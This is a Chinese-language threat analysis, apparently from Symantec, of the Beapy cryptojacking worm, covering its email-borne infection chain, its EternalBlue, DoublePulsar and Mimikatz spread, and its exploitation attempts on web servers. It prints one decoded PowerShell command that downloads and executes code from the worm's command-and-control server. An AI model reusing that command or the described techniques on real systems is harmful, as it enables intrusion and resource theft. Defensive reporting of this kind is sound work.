2019年1月,赛门铁克安全中心首次监测到Beapy,一种新型的加密劫持程序,它可以利用 EternalBlue 漏洞以及窃取的硬编码凭据,在网络中快速传播并对企业进行攻击。如今,我们在Web服务器上也检测到了Beapy活动,并且自3月份以来Beapy的攻击范围还在不断增加。
Beapy (W32.Beapy) 是一种基于文件的货币挖矿程序,其最初感染源为电子邮件。虽然自 2018 年初以来,加密劫持的数量已经有所减少,但Beapy的出现说明,加密劫持仍然是某些网络犯罪分子的首选手段,而企业成为了他们的首要攻击目标。
以攻击目标来看,Beapy的攻击对象几乎全部是企业(见图 1)。这一攻击趋势与2018 年 的Bluwimps 蠕虫 (MSH.Bluwimps) 十分相似,这表示加密劫持网络犯罪分子对企业的关注度更高,这一发现在赛门铁克 2019 年《互联网安全威胁报告》 中也有提到。虽然没有证据表明这些网络攻击活动的针对性,但Beapy蠕虫病毒的特性表明,它很可能被设计为主要依靠企业网络来进行传播。
这与2018 年勒索软件的趋势十分类似——尽管从总体来看,2018年勒索软件感染率下降了 20%,但企业的感染率却依旧增加了 12%,由此可见,网络犯罪分子对企业的关注度还在持续增加。
Beapy恶意程序对亚洲企业的影响最为严重,其中超过 80%的受害者及受害企业来自中国,其余的20%则分布于韩国、日本和越南等其他国家和地区。
感染链
Beapy 活动的最初感染源是电子邮件。如果收件人打开了带有恶意Excel文档的附件,目标计算机就会主动下载DoublePulsar 后门 (Backdoor.Doublepulsar)。同 EternalBlue 一样,DoublePulsar 也会在 Shadow Brokers 转储中进行泄露,这一行为也曾被用于 2017 年 WannaCry 勒索软件破坏性攻击。DoublePulsar 会在受感染的计算机上开启后门程序并允许远程代码执行操作。EternalBlue 则利用 Windows SMB 协议中的漏洞允许文件在网络中横向传播。
DoublePulsar 安装成功后,会执行一个 PowerShell 命令,并在与Beapy命令和控制服务器通信后将货币挖矿程序下载到目标计算机。2019 年 2 月 15 日,赛门铁克安全中心第一次监测到了DoublePulsar 后门程序,随后 PowerShell 命令被启动,该命令被解码为以下内容:
IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)
这意味着设备正在与 Beapy 命令和控制服务器建立通信,计算机会继续执行其他的PowerShell 命令,同时下载货币挖矿程序。在 Beapy 传播到网络中其他计算机上时,会重复此过程。
一般而言,Beapy 会将未安装补丁的机器作为攻击对象,然后借助EternalBlue进行传播。但是,EternalBlue 并不是 Beapy的唯一传播工具,它还可以使用凭据盗窃工具 Hacktool.Mimikatz 从受感染的计算机上收集凭证。通过这些传播工具,Beapy甚至还可以传播到安装了补丁程序的机器上。与 Bluwimps 蠕虫类似,Beapy 甚至还可以使用硬编码用户名和密码列表尝试跨网络传播。早在 2017 年和 2018 年,Bluwimps就曾使用货币挖矿程序感染了数千台企业机器。
Web 服务器
赛门铁克安全中心还在面向公众的 Web 服务器上监测到了 Beapy 的早期版本,当时该程序试图传播到与服务器相连的计算机上,形式之一是它会自动生成一个攻击目标的IP地址列表。
在Web 服务器上看到的是Beapy程序的早期版本,早期版本与后来的版本都是由 C 语言编写,而非 Python ,并且攻击手段类似,其下载的恶意软件中也含有用于凭据收集的 Mimikatz 模块,以及 EternalBlue的漏洞利用功能。
在Web 服务器攻击中,Beapy 曾试图利用 Apache Struts 漏洞 (CVE-2017-5638) ——这一漏洞在 2017 年进行了修补,但如果它被成功攻破并利用,便会允许远程代码执行操作。Beapy 还尝试利用了 Apache Tomcat (CVE-2017-12615) 和 Oracle WebLogic Server (CVE-2017-10271) 中的已知漏洞。在赛门铁克观察到的Web 服务器攻击中,这种漏洞利用尝试行为开始于 2 月初,首次检测到与Beapy命令和控制服务器的通信是在 3 月 13 日,针对此 Web 服务器的 Beapy 活动则一直持续到 4 月初。
总体来说, Beapy 的活动从3月初开始便一直在增加。
Beapy 活动表明了什么?
2018 年加密劫持的攻击活动有所减少(加密劫持量下降 52% ),但网络犯罪分子依旧十分热衷于这种入侵方式。相比2018 年 2 月 的峰值 800 万次,2019 年 3 月加密劫持活动总数低于 300 万,尽管在数据上有所在下降,但是加密劫持活动依然活跃。
Beapy 是一种基于文件传播的货币挖矿程序,但有趣的是,大部分加密劫持攻击行为都是通过基于浏览器的货币挖矿程序而进行。由于这种货币挖矿程序的进入门槛较低,且可以通过这一程序入侵已经安装补丁的计算机,从而受到黑客的欢迎。2017 年 9 月,Coinhive 货币挖矿服务推出后曾助长加密劫持活动,但这一服务在今年3 月初已经停止运营,基于浏览器的加密劫持也随之大幅减少。Coinhive 货币挖矿服务使得任何人都可以轻松地基于浏览器实施挖矿行为,因此关闭此项服务可能会对基于浏览器的加密劫持产生巨大影响。
另外,相比较基于浏览器的货币挖矿程序,基于文件的挖矿程序优势更加明显,它可以更快地挖掘加密货币。门罗币是加密劫持攻击期间最常被挖掘的加密货币,但是门罗币在2018 年贬值了90%,由此可见网络犯罪分子现在更偏爱可以快速挖掘加密货币的挖矿程序以帮助他们牟取更多的利益。
图 5.基于浏览器和基于文件的货币挖矿程序盈利能力比较
加密劫持对企业的影响
相比勒索软件带来的破坏性威胁,企业或许认为他们无需担心加密劫持活动。但实际上加密劫持也会对公司运营产生重大的影响。
加密劫持对企业的潜在影响包括:
- 设备性能下降,可能会降低员工士气并造成生产力下降;
- 电池过热;
- 设备性能退化或无法使用,从而导致 IT 成本增加;
- 耗电量增加,造成成本增加,特别是基于 CPU 使用量计费的云企业。
企业需要确保其网络免受各种安全威胁的侵害。 
